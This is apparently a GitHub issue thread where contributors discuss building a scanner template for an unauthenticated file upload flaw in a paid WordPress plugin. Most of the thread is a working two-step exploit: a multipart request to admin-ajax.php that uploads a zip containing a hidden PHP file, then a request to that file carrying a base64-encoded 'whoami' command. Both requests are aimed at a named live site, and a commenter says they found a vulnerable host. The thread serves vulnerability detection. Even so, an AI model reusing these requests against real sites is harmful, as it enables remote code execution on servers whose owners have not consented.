Open akincibor opened 2 years ago
@akincibor i checked the plugin, it seems be paid version https://tatsubuilder.com/
Let me know if i'm wrong
Hi @DhiyaneshGeek
The first request upload a zip file (example.zip) containing a php file (.examplephp.php :
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: www.wcsart.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
X-Requested-With: XMLHttpRequest
Origin: http://www.wcsart.com
Referer: http://www.wcsart.com
Accept-Language: en-US,en;q=0.9
Content-Length: 509
Content-Type: multipart/form-data; boundary=5e77a7410a108fe824da522d90cb1200
--5e77a7410a108fe824da522d90cb1200
Content-Disposition: form-data; name="action"
add_custom_font
--5e77a7410a108fe824da522d90cb1200
Content-Disposition: form-data; name="file"; filename="example.zip"
PK\x03\x04\x14\x00\x00\x00\x08\x00h\x91\x19U\x0f\xe6\xc6\x08\x92\x00\x00\x00\xb8\x00\x00\x00\n\x00\x00\x00.examplefile.php\xb3\xb1/\xc8(PPIS\xb0UP\xca\xc9M\xad,.Q\xb2vPI\xb4\x05\nE\x9b\xc4\xea\x01Ic0\ta\x9b\x82I#0i\x18\x0bTX\x9e_\x94R\x0c\xd4\x9bXT\x94X\xa9\x91\x94X\x9cjf\x12\x9f\x92\x9a\x9c\x9f\x92\xaa\xa1\x12\x1f\xe0\x1f\x1c\x12\xad^\x92ZQ\xa2\x1e\xab\xa9i\xad\x92e\xab\x04V\xa8\xa4\xa7\x14\x0f\xc4i\x999%\xa9E \xfb \xac\xd4\x94x\x98y*Y\x1a\x10\xb3u\x14T\x125\xad\x1dJ\xf3r2\xf3\xb25\xe2\xe3\xdd<}\\\xe3\xe35\xad\x01PK\x01\x02\x14\x03\x14\x00\x00\x00\x08\x00h\x91\x19U\x0f\xe6\xc6\x08\x92\x00\x00\x00\xb8\x00\x00\x00\n\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\x01\x00\x00\x00\x00.examplefile.phpPK\x05\x06\x00\x00\x00\x00\x01\x00\x01\x008\x00\x00\x00\xba\x00\x00\x00\x00\x00
--5e77a7410a108fe824da522d90cb1200--
It should be uploaded in the endpoint /wp-content/uploads/typehub/custom/example/.examplefile.php
The second request is :
POST /wp-content/uploads/typehub/custom/example/.examplefile.php HTTP/1.1
Host: www.wcsart.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
X-Requested-With: XMLHttpRequest
Origin: http://www.wcsart.com
Referer: http://www.wcsart.com
Accept-Language: en-US,en;q=0.9
Content-Length: 7
Content-Type: application/x-www-form-urlencoded
text=d2hvYW1p
d2hvYW1p is base64(whoami)
I think I found a vulnerable host, check Discord
Hi,
Can someone help me to convert this python PoC into a template ?
https://wpscan.com/vulnerability/fb0097a0-5d7b-4e5b-97de-aacafa8fffcd